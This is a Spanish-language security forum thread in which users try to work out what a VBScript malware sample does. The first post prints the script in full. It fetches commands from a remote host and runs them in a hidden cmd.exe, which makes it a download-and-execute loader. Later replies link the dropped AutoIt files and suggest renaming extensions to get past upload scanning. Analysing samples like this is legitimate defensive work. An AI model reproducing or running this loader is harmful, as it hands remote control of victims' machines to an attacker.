elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: 4n4lDetector v1.3: herramienta de análisis estático de malware


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  Virus en vbs
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Virus en vbs  (Leído 714 veces)
xDark_R

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Virus en vbs
« en: 9 Febrero 2020, 23:29 »

Descargando unas cositas me he encontrado con un vbs bastante interesante y me gustaria saber que hace, se que transfiere un script al disco duro con extension .au3 pero no he podido abrirlo para ver que hace, alguna idea?

Este es el script

dim Winhttps
Set Winhttps = CreateObject("Winhttp.WinhttpRequest.5.1")
gkpaeb1 = "http://82.111.231.133.static.cdnserver.in/"
Winhttps.Open "POST", gkpaeb1, False
Winhttps.Send
dim Application
Application =  Wscript.ScriptName

CreateObject("Shell.Application").Application.ShellExecute "c:\windows\system32\cmd",Winhttps.responseText & Application,gkpaeb,"",0











En línea

Alvarito050506

Desconectado Desconectado

Mensajes: 25



Ver Perfil WWW
Re: Virus en vbs
« Respuesta #1 en: 10 Febrero 2020, 00:39 »

Hola xDark_R,

Actualmente la página http://82.111.231.133.static.cdnserver.in está caída, por lo que es imposible saber con exactitud qué es lo que hace este supuesto virus. El resultado del escaneo de VirusTotal no es demasiado "revelador", puedes echarle un vistazo aquí.

Tal vez, si subieras el archivo .au3 que mencionaste, podríamos ayudarte mejor.

¡Saludos!

Edito: Busca literalmente "cdnserver.in" (con las comillas y todo) en Google, parece haber algo de información por ahí. Seguiré investigando.


« Última modificación: 10 Febrero 2020, 00:44 por Alvarito050506 » En línea

xDark_R

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Virus en vbs
« Respuesta #2 en: 10 Febrero 2020, 00:44 »

No se como subirlo, tambien he visto que esta caida pero lo he ejecutado en una maquina virtual y si que funciona.
En línea

Alvarito050506

Desconectado Desconectado

Mensajes: 25



Ver Perfil WWW
Re: Virus en vbs
« Respuesta #3 en: 10 Febrero 2020, 00:50 »

Por lo de cómo subirlo, cámbiale la extensión a una conocida y súbelo a algún servicio del estilo MEGA que no examine los archivos (maldito Google Drive). Creo que MEGA incluso te deja subir archivos con la extensión que quieras.

Otra cosa que podés hacer antes que nada es abrir el archivo con el Notepad++ o un editor hexadecimal (Bless, hexdump) y fijarte cuales son los primeros seis caracteres, con eso podés saber qué tipo de archivo es en realidad (saber su MIME Type).

Con respecto a lo de la máquina virtual,  :o, es algún tipo de protección que ofrece Cloudflare, pero no sé más qué decir.
En línea

xDark_R

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Virus en vbs
« Respuesta #4 en: 10 Febrero 2020, 01:10 »

He subido todo lo que he conseguido, en la foto esta el código que se ejecuta en la consola de windows y en la carpeta están los archivos que descarga el script

https://mega.nz/#F!5sJg3IhR!klSoZowEAxN7CQVsg8KxZQ
En línea

Alvarito050506

Desconectado Desconectado

Mensajes: 25



Ver Perfil WWW
Re: Virus en vbs
« Respuesta #5 en: 10 Febrero 2020, 01:17 »

Bueno, el código de la imagen es simplemente una manera "elegante" de descargar los archivos y ejecutar el script de AutoIt base.au3. Buscaré una forma de descompilarlo (las hay miles) pero, mientras tanto, ¿podrías subir el contenido del archivo %temp%\test.txt?
En línea

xDark_R

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Virus en vbs
« Respuesta #6 en: 10 Febrero 2020, 01:20 »

No se crea ese archivo lo he ejecutado varias veces y nada, puede que lo borre después con el otro script (el .au3).
En línea

Alvarito050506

Desconectado Desconectado

Mensajes: 25



Ver Perfil WWW
Re: Virus en vbs
« Respuesta #7 en: 10 Febrero 2020, 01:39 »

Hmmm... Interesante. Mañana continuaré con la "investigación:rolleyes:.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines